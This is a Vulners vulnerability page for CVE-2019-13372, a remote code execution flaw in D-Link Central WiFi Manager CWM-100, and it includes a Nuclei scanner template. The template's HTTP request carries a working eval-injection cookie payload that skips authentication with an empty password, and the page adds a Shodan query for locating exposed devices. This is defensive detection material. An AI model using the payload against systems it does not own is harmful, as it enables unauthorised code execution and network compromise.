Vulners
Lucene search
D-Link Central WiFi Manager CWM(100) - Remote Code Execution
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | D-Link Central WiFi Manager CWM(100) Remote Code Execution Exploit | 18 Aug 202000:00 | – | zdt |
 | The vulnerability in the /web/Lib/Action/IndexAction.class.php file of the software controller for D-Link Central WiFi Manager CWM(100) allows a hacker to execute arbitrary code. | 9 Oct 201900:00 | – | bdu_fstec |
 | CVE-2019-13372 | 7 Jul 201901:59 | – | circl |
 | D-Link Central WiFi Manager (CWM-100) Remote Code Execution Vulnerability | 8 Jul 201900:00 | – | cnvd |
 | D-Link Central WiFiManager CWM-100 Remote Code Execution (CVE-2019-13372) | 13 Nov 202200:00 | – | checkpoint_advisories |
 | CVE-2019-13372 | 6 Jul 201922:54 | – | cve |
 | CVE-2019-13372 | 6 Jul 201922:54 | – | cvelist |
 | D-Link Central WiFi Manager CWM(100) RCE | 18 Aug 202017:41 | – | metasploit |
 | CVE-2019-13372 | 6 Jul 201923:15 | – | nvd |
 | CVE-2019-13372 | 6 Jul 201923:15 | – | osv |
10
id: CVE-2019-13372
info:
name: D-Link Central WiFi Manager CWM(100) - Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
/web/Lib/Action/IndexAction.class.php in D-Link Central WiFi Manager CWM(100) before v1.03R0100_BETA6 allows remote attackers to execute arbitrary PHP code via a cookie because a cookie's username field allows eval injection, and an empty password bypasses authentication.
impact: |
Unauthenticated attackers can execute arbitrary PHP code via cookie manipulation, leading to complete compromise of the D-Link Central WiFi Manager and potential access to all managed WiFi networks.
remediation: |
Update D-Link Central WiFi Manager to version 1.03R0100_BETA6 or later.
reference:
- https://github.com/unh3x/unh3x.github.io/blob/master/_posts/2019-02-21-D-link-%28CWM-100%29-Multiple-Vulnerabilities.md
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117
- https://unh3x.github.io/2019/02/21/D-link-%28CWM-100%29-Multiple-Vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2019-13372
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-13372
cwe-id: CWE-94
epss-score: 0.80682
epss-percentile: 0.99575
cpe: cpe:2.3:a:dlink:central_wifimanager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: dlink
product: central_wifimanager
shodan-query: html:"D-Link Central WiFiManager"
tags: cve,cve2019,d-link,wifimanager,vkev,vuln
variables:
string: "{{rand_text_alpha(10)}}"
http:
- raw:
- |
GET /index.php/Index/index HTTP/1.1
Host: {{Hostname}}
Cookie: username=',0,"",1,"0")%3becho%20"{{string}}"%3b//";password=
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{string}}"
- "/public/css/"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221009dc3bc2abd8b75ad3475834673056480c125d03fb6ba9eab10980f91d2050bba02207cc3cf268da991102463e855cd8f0c27c3fccbf04edcbd079592a8f0725c8fd5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 27.5
CVSS 3.19.8
EPSS0.80682